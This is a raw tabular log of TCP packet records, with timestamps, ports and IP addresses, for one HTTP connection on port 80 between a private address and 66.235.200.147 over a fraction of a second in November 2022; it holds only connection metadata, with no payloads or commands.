Nov 26, 2022 11:17:42.489317894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489348888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489362001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489392042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489403009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489434004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489442110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489475965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489484072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489517927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489526987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489559889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489568949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489619017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489629030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489660025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489672899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489702940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489712000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489746094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489753962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489787102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489801884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489833117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489841938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489876986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489883900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489918947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489928961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489959955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489968061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490000963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490010023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490042925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490052938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490086079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490099907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490128040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490139008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490170002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490179062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490211964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490255117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490261078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490261078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490295887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490304947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490339041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490350962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490381002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490392923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490423918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490433931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490454912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490473986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490495920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490504026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490537882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490549088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490578890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490590096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490621090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490632057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490662098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490670919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490704060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490712881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490746021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490758896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490787983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490801096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490833044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490842104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490875006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490906954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490951061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.490956068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.490993977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491005898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491035938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491046906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491076946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491091013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491120100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491130114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491163015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491178036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491204977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491214991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491246939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491255045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491288900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491298914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491329908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491363049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491372108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491383076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491413116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491425037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491456032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491466045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491498947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491533041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491540909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491554022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491584063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491626024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491626978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491645098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491667032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491672039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491708994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491750002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491764069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491792917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491805077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491839886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491880894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491895914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491923094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491930008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.491965055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.491981983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492008924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492022038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492050886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492084026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492115974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492142916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492157936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492181063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492201090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492202997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492244005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492254019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492284060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492294073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492326021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492333889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492367029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492377043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492407084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492449045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492460012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492491007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492492914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492515087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492533922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492557049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492578030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492587090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492618084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492655039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492656946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492697001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492713928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492738962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492739916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492758036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492782116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492798090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492825031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492834091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492866993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492876053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492909908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492919922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492950916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.492959023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.492990971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493000984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493033886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493055105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493073940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493083000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493115902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493124008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493155003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493165970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493199110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493207932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493241072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493249893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493282080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493288994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493323088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493328094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493364096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493374109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493403912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493417025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493444920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493479967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493486881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493499994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493529081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493542910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493571997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493582010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493612051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493623018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493653059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493664980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493695021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493702888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493730068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493743896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493772030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493782043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493813038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493823051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493858099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493866920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493902922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493908882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493943930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493956089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.493984938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.493993998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494026899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494035959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494067907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494076967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494108915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494119883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494148970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494183064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494191885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494203091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494235039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494240999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494276047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494286060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494318008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494329929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494359970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494369984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494400024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494410038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494441986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494448900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494482994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494493961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494525909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494532108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494568110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494580984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494609118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494621038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494651079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494661093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494692087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494700909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494731903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494741917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494772911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494787931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494817019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494826078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494858027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494868040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494910002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.494924068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494967937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.494982004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495008945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495012045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495055914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495074034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495100021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495119095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495119095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495141029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495147943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495182037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495198011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495224953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495235920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495266914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495275974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495310068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495320082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495351076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495362043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495392084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495402098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495434046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495444059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495475054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495486975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495517969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495523930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495558977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495563030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495601892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495611906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495645046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495654106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495685101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495696068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495726109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495735884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495767117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495778084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495809078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495815039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495852947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495853901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495894909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495907068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495937109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495946884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.495980024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.495990038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.496021986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.496032953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.496063948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.496093035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.496108055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.496134996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.496157885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.497515917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513134003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513176918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513202906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513212919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513226986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513243914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513252974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513257980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513279915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513290882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513304949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513305902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513324976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513329983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513354063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513370037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513385057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513406038 CET	49707	80	192.168.2.5	66.235.200.147
